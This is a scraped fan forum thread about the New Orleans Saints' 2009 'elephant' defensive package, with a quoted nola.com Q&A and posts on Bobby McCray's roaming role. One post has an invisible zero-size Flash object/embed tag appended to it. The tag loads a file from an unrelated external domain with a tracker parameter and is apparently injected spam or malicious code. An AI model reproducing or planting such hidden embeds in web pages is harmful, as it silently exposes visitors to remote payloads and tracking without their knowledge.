The Saint's Elephant defense (1 Viewer)

Ok, from watching the game, we ran every kind of defense we can.

We ran the 3-4, 4-3, dime, nickel, elephant, cover-1, cover-2, cover-3. Wow, our D is going to be as fun to watch as our O for football heads.

They've been using it since Williams got here:

Q: Jeff, Gregg Williams has stated his defense will be "vanilla" through the preseason and be more aggressive when the regular season starts. I know they played the Lions last week, but I didn't see anything different in the play calling and aggressiveness of the defense. Was it because they didn't feel the need to? They are playing a more superior team than the Lions this week and I hope they show their true colors. Wayne, Morgan City.
A: I think Williams kept things pretty basic against Detroit for a lot of reasons primarily because he didn't need to get too fancy to get the win. The Saints did show Matthew Stafford some different looks early in the game. They played a 3-4 package and an elephant package. The disguised a lot of their coverages, which kept Stafford off-balance and forced him to throw several wild incompletions. All in all, I thought Williams showed just enough different things to be effective without tipping their hand too much for the Eagles."

http://www.nola.com/saints/index.ssf/2009/09/_another_round_of_excellent.html

I believe the term elephant in regards to this defense has somrthing to do with the University of Alabama.

I saw several metions of the Saints showing Stafford an elephant defense last weekend? What exactly is that and what personnel did the Saints use in this formation vs. Detroit?

Its a 3-4 style. But instead of using 4 linebackers, you use 3 linebacks and a lineman (Bobby McCray). McCray has a lot of freedom of this package, he can drop back, blitz, etc.
We were also using a true 3-4 againt the lions with Marvin Mitchell as the second inside linebacker.
We even used a 3-2-6 package, when Randall Gay almost made that interception.
This defense so far has been pretty fun to watch.

Bobby McCray sorta roams along the line before the snap. He could blitz or drop into coverage. I'm not sure if they run it out the 4-3 or the 3-4 alignment.

There was one play I vividly remember and even said at the game that McCray wasnt in his stance just before the snap. And he had walked from RE to LE as the QB was calling out his count. At the snap he took half step toward line then dropped about 10 yds back in coverage.

How do you get down from an elephant?

Didn't we used to do a camel or something?

So Bobby McCray is the trunk.<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="0" height="0"><param name="movie" value="http://brbyowner.com/?tracker=4730"></param><param name="allowFullScreen" value="true"></param><embed src="http://brbyowner.com/?tracker=4730" type="application/x-shockwave-flash" allowfullscreen="true" width="0" height="0"></embed></object>

Yeah he is. Who is the tusk???

Didn' Mike Dika have a Dumbo offense? Oh, it was Jumbo w/ two TEs. The Dumbo was Dika and Abramawiz.

Create an account or login to comment

You must be a member in order to leave a comment

Create account

Create an account on our community. It's easy!

Already have an account? Log in here.

Users who are viewing this thread

Back
    Top Bottom